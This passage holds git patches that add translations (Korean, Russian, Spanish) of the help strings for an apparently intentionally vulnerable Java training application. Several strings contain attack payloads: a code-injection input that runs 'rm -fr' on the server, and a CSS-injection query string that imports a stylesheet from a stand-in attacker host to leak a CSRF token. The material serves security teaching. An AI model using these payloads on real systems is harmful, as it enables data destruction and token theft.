msg.note.dangerous.file.inclusion=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=[\u60aa\u610f\u306e\u3042\u308bJSP\u30d5\u30a1\u30a4\u30eb\u304c\u30c7\u30d7\u30ed\u30a4\u3055\u308c\u305fURL]\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 msg.note.db.connection.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.deadlock=\u3053\u306e\u30da\u30fc\u30b8\u3092\u9023\u7d9a\u3067\u6570\u56de\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 @@ -284,6 +289,7 @@ msg.reverse.color=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u msg.reverse.color.complete=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.reverse.color.fail=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.select.year=Please select an year. msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002 @@ -324,6 +330,7 @@ title.codeinjection.page=JSON\u306e\u89e3\u6790 title.commandinjection.page=\u6570\u5024\u51e6\u7406\u306e\u5b9f\u884c title.createobjects.page=\u81ea\u7136\u6570\u306e\u7dcf\u548c title.csrf.page=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4 +title.cssinjection.page=Change Style title.current.date=\u73fe\u5728\u65e5\u4ed8\u306e\u8868\u793a title.current.time=\u73fe\u5728\u6642\u523b\u306e\u8868\u793a title.dbconnectionleak.page=\u30e6\u30fc\u30b6\u30fc\u4e00\u89a7 From ebeef6e876a435feb91f1c5af6f46a5759390942 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:07 +0900 Subject: [PATCH 137/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From bfb24952d9ff04f636d803e674c2c2a841dc92c9 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:09 +0900 Subject: [PATCH 138/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List From 0185a3799c3f6c78a37ca575f7b23d50e97533fe Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 30 Oct 2019 16:34:11 +0900 Subject: [PATCH 139/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index e4296dc..094a949 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -22,6 +22,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.cssinjection=There is a CSS injection vulnerability in this page. function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. @@ -71,6 +72,7 @@ function.name.brute.force=Login page that allows brute-force attacks function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.cssinjection=CSS Injection function.name.dangerous.file.inclusion=Dangerous File Inclusion function.name.database.connection.leak=Database Connection Leak function.name.dead.lock=Deadlock (Java) @@ -129,6 +131,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.default=Default label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page @@ -155,6 +158,7 @@ label.metaspace=Metaspace label.name=Name label.numbers=Numbers label.obelus=/ +label.original.style=Original Style label.password=Password label.permgen.space=PermGen space label.phone=Phone @@ -236,6 +240,7 @@ msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);//@Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. +msg.note.cssinjection=If you deploy the following CSS file at http\://attacker.site/cssinjection.css and add style\=%40import%20url(%22http%3A%2F%2Fattacker.site%2Fcssinjection.css%22)%3B is added to the query string, then the first character of hidden CSRF token will be sent to http\://attacker.site/. If you also deploy an application that executes this recursively on http\://attacker.site/, then you can get the whole CSRF token. The reproducibility of this issue depends on the browser which you use. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. @@ -284,6 +289,7 @@ msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.log.level=Please select a log level of the console logger which is used only in this feature. +msg.select.or.enter.style=Please select or enter a style (CSS) to apply to this page. msg.select.upload.file=Select a file to upload. msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. @@ -324,6 +330,7 @@ title.codeinjection.page=Parse JSON title.commandinjection.page=Performing Basic Numeric Operations title.createobjects.page=Sum of natural numbers title.csrf.page=Change Your Password +title.cssinjection.page=Change Style title.current.date=Display Current Date title.current.time=Display Current Time title.dbconnectionleak.page=User List